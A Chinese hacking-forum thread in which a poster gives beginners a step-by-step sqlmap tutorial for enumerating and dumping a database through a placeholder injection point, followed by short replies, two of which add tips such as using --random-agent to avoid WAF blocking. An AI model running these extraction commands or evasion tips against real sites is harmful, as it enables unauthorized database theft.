安子超 发表于 2016-1-10 22:53:56

菜鸟如何使用SQLMAP

以下内容可能会对大牛造成恶心、眩晕等不良反应。关闭该页面即可好转

      SQLMAP是一个自动注入化工具 运行在Python 2.7 环境有具有很强跨平台性、无图形界面

1.
   使用快捷方式启动

2.
   现做如下假设   
                           1. 已经安装Python2.7 并已经添加了环境变量
                           2. 已经下载了SQLMAP
                           3. 会使用cmd命令行
                                                      我知道你们都是大牛
3.
   打开要在sqlmap的目录里


注入点 、绝对不要做坏事 我们是白帽黑阔 这已经提交补天了


**************************************


sqlmap.py -u "注入点" //会判断数据库类型,服务操作系统、脚本类型 前后有双引号



03服务器 / asp.net / ms sql 2008


sqlmap.py -u "注入点" --dbs //列数据库 按上键






sqlmap.py -u "注入点" -D 数据库名 --tables//列出表名





sqlmap.py -u "注入点" -D 数据库名 -T 表名 --columns//猜字段




sqlmap.py -u "注入点" -D 数据库名 -T 表名 -C "字段名2,字段名2” --dump //获得字符、段内容



小圈圈 发表于 2016-1-11 08:57:47

我不是大牛@_@

haowozao 发表于 2016-1-11 09:28:08

完全看不懂的说

蓝颜 发表于 2016-1-11 14:31:08

哪里恶心头疼了http://www.ihonker.org//mobcent//app/data/phiz/default/38.png

caizi 发表于 2016-1-11 17:12:02

不错不错,终于学会了

雨僧 发表于 2016-1-12 14:36:44

只是一些非常初级的东西,详细的推荐大家去freebuf

Mrlin 发表于 2016-1-13 12:23:53

飘零 发表于 2016-2-12 10:28:47

觉得很好呢

热心网友6 发表于 2026-5-20 10:15:00

Re: 菜鸟如何使用SQLMAP

感谢楼主的分享,对于刚接触SQLMAP的菜鸟来说,这份简明扼要的步骤很实用。你特意强调了“绝不做坏事”和“白帽黑阔”,这点很重要,安全工具用在合法授权范围内才能真正帮助技术成长。另外补充一个小建议:如果觉得每次输入完整URL麻烦,可以先用--batch参数跳过交互询问,或者把常用命令写个批处理脚本,能省不少时间。环境变量没配好的话,直接在SQLMAP目录下打开cmd运行也是可以的。期待你后续更多经验分享!

热心网友2 发表于 2026-6-17 19:50:00

Re: 菜鸟如何使用SQLMAP

感谢楼主的分享,教程写得简单明了,对新手很友好。尤其是一开始就强调“不要做坏事”,这点很有责任心。我自己刚开始学SQL注入时也常用SQLMAP,不过建议新手注意两点:一是加上`--random-agent`避免被WAF封IP,二是用`--batch`跳过交互确认,跑起来更方便。另外,最好在虚拟机或授权靶场里练习,安全第一。再次感谢整理!
页: [1]
查看完整版本: 菜鸟如何使用SQLMAP